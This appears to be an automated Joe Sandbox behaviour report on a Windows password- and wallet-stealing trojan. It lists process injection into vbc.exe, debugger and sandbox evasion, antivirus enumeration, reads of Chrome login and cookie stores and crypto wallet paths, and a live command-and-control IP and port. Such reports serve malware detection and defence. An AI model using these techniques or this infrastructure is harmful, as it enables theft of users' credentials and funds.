                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File created: C:\Users\user\AppData\Local\Yandex
                      Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/1@0/1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: 0.3.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.5e0000.0.unpack, BrEx.cs Base64 encoded string: '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
                      Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:576:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3276:120:WilError_01
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Code function: 0_2_00408329 push ecx; ret 0_2_0040833C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 2_2_07368976 push es; retf 2_2_07368977
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Code function: 0_2_0040A6AC LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 0_2_0040A6AC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 1980 Thread sleep count: 4610 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4848 Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4412 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_0-5807
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Window / User API: threadDelayed 4610
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Process information queried: ProcessInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Code function: 0_2_00409EB4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00409EB4
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Code function: 0_2_0040A6AC LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_0040A6AC
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Code function: 0_2_00403620 GetVersion,AreFileApisANSI,FindFirstPrinterChangeNotification,QueryPerformanceFrequency,WritePrinter,GetProcessHeap,FindClosePrinterChangeNotification,CreateEventW,GetLogicalDrives,CreateFileW,CreateFileW,GetCurrentProcess,CreateMutexW,CreateFileW,IsProcessorFeaturePresent,FindClosePrinterChangeNotification,FindClosePrinterChangeNotification,0_2_00403620
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Code function: 0_2_00414154 mov eax, dword ptr fs:[00000030h] 0_2_00414154
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Memory allocated: page read and write | page guard
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Code function: 0_2_00409EB4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00409EB4
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Code function: 0_2_0040E97E __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040E97E
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Code function: 0_2_00406F82 SetUnhandledExceptionFilter,0_2_00406F82
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Code function: 0_2_00409384 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00409384

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 11BD008
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and write
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Code function: 0_2_00414189 CreateProcessW,GetThreadContext,ReadProcessMemory,VirtualAlloc,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,VirtualFree,WriteProcessMemory,SetThreadContext,ResumeThread,0_2_00414189
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Code function: GetLocaleInfoA,0_2_0040EF07
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Code function: 0_2_004084CC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_004084CC
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Code function: 0_2_00403620 GetVersion,AreFileApisANSI,FindFirstPrinterChangeNotification,QueryPerformanceFrequency,WritePrinter,GetProcessHeap,FindClosePrinterChangeNotification,CreateEventW,GetLogicalDrives,CreateFileW,CreateFileW,GetCurrentProcess,CreateMutexW,CreateFileW,IsProcessorFeaturePresent,FindClosePrinterChangeNotification,FindClosePrinterChangeNotification,0_2_00403620
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                      Stealing of Sensitive Information

                      Source: Yara match File source: dump.pcap, type: PCAP
                      Source: Yara match File source: 0.3.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.5e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.414788.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.318847444.00000000005E2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe PID: 3384, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: vbc.exe PID: 260, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ElectrumE#
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: k2C:\Users\user\AppData\Roaming\Electrum\wallets\*
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: JaxxE#
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum\wallets
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ExodusE#
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: EthereumE#
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: k6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: Yara match File source: 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: vbc.exe PID: 260, type: MEMORYSTR

                      Remote Access Functionality

                      Source: Yara match File source: dump.pcap, type: PCAP
                      Source: Yara match File source: 0.3.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.5e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.414788.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.318847444.00000000005E2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe PID: 3384, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: vbc.exe PID: 260, type: MEMORYSTR
                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | 221 Windows Management Instrumentation | Path Interception | 411 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | 2 Native API | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | LSASS Memory | 24 Security Software Discovery | Remote Desktop Protocol | 3 Data from Local System | Exfiltration Over Bluetooth | 1 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 231 Virtualization/Sandbox Evasion | Security Account Manager | 11 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 411 Process Injection | NTDS | 231 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 21 Obfuscated Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | 135 System Information Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                      Source | Detection | Scanner | Label | Link
                      SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe | 30% | Virustotal | |
                      SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe | 100% | Joe Sandbox ML | |
                      No Antivirus matches
                      No contacted domains info
                      Name | Malicious | Antivirus Detection | Reputation
                      193.106.191.138:32796 | true | URL Reputation: safe | unknown
                      Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                            high
                                                                                                                            http://schemas.xmlsoap.org/ws/2006/02/addressingidentityvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://schemas.xmlsoap.org/soap/envelope/vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://search.yahoo.com?fr=crmas_sfpfvbc.exe, 00000002.00000002.423894970.0000000007996000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.404603370.0000000008754000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.404090422.0000000008685000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.408056557.000000000880D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405554878.000000000883F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405444480.0000000008822000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.421928279.0000000007730000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.407871530.00000000087F0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.403947258.0000000008668000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.406589920.000000000897E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trustvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollbackvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://tempuri.org/Entity/Id23Responsevbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/06/addressingexvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wscoorvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/Noncevbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs
IP:193.106.191.138
Domain:unknown
Country:Russian Federation
ASN:42238
ASN Name:BOSPOR-ASRU
Malicious:true
                                                                                                                                                  Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                                  Analysis ID:756115
                                                                                                                                                  Start date and time:2022-11-29 16:49:14 +01:00
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 7m 41s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Sample file name:SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe
                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:5
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@5/1@0/1
                                                                                                                                                  EGA Information:
                                                                                                                                                  • Successful, ratio: 50%
                                                                                                                                                  HDC Information:
                                                                                                                                                  • Successful, ratio: 90.9% (good quality ratio 87.2%)
                                                                                                                                                  • Quality average: 82.3%
                                                                                                                                                  • Quality standard deviation: 25.7%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 99%
                                                                                                                                                  • Number of executed functions: 151
                                                                                                                                                  • Number of non-executed functions: 11
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                  • Stop behavior analysis, all processes terminated
                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe
                                                                                                                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
                                                                                                                                                  • Execution Graph export aborted for target vbc.exe, PID 260 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
Time:16:50:51
Type:API Interceptor
Description:23x Sleep call for process: vbc.exe modified
Match | Associated Sample Name / URL | Detection
193.106.191.138 | file.exe | malicious
193.106.191.138 | PXXvSes14Z.exe | malicious
193.106.191.138 | No3dRyTWsy.exe | malicious
193.106.191.138 | w8mkzbDz4A.exe | malicious
193.106.191.138 | file.exe | malicious
193.106.191.138 | file.exe | malicious
193.106.191.138 | file.exe | malicious
193.106.191.138 | file.exe | malicious
193.106.191.138 | file.exe | malicious
193.106.191.138 | file.exe | malicious
193.106.191.138 | file.exe | malicious
193.106.191.138 | file.exe | malicious
193.106.191.138 | file.exe | malicious
193.106.191.138 | file.exe | malicious
193.106.191.138 | file.exe | malicious
193.106.191.138 | file.exe | malicious
193.106.191.138 | file.exe | malicious
193.106.191.138 | file.exe | malicious
193.106.191.138 | file.exe | malicious
193.106.191.138 | file.exe | malicious
                                                                                                                                                                                          No context
Match | Associated Sample Name / URL | Detection | Context
BOSPOR-ASRU | file.exe | malicious | 193.106.191.138
BOSPOR-ASRU | PXXvSes14Z.exe | malicious | 193.106.191.138
BOSPOR-ASRU | eJAL1GSkQP.exe | malicious | 193.106.191.15
BOSPOR-ASRU | t8B2Qcl0nS.exe | malicious | 193.106.191.196
BOSPOR-ASRU | No3dRyTWsy.exe | malicious | 193.106.191.138
BOSPOR-ASRU | w8mkzbDz4A.exe | malicious | 193.106.191.138
BOSPOR-ASRU | file.exe | malicious | 193.106.191.138
BOSPOR-ASRU | file.exe | malicious | 193.106.191.138
BOSPOR-ASRU | file.exe | malicious | 193.106.191.138
BOSPOR-ASRU | file.exe | malicious | 193.106.191.138
BOSPOR-ASRU | file.exe | malicious | 193.106.191.138
BOSPOR-ASRU | file.exe | malicious | 193.106.191.138
BOSPOR-ASRU | file.exe | malicious | 193.106.191.138
BOSPOR-ASRU | file.exe | malicious | 193.106.191.138
BOSPOR-ASRU | file.exe | malicious | 193.106.191.138
BOSPOR-ASRU | file.exe | malicious | 193.106.191.138
BOSPOR-ASRU | file.exe | malicious | 193.106.191.138
BOSPOR-ASRU | file.exe | malicious | 193.106.191.138
BOSPOR-ASRU | file.exe | malicious | 193.106.191.138
BOSPOR-ASRU | file.exe | malicious | 193.106.191.138
                                                                                                                                                                                          No context
                                                                                                                                                                                          No context
                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):2843
                                                                                                                                                                                          Entropy (8bit):5.3371553026862095
                                                                                                                                                                                          Encrypted:false
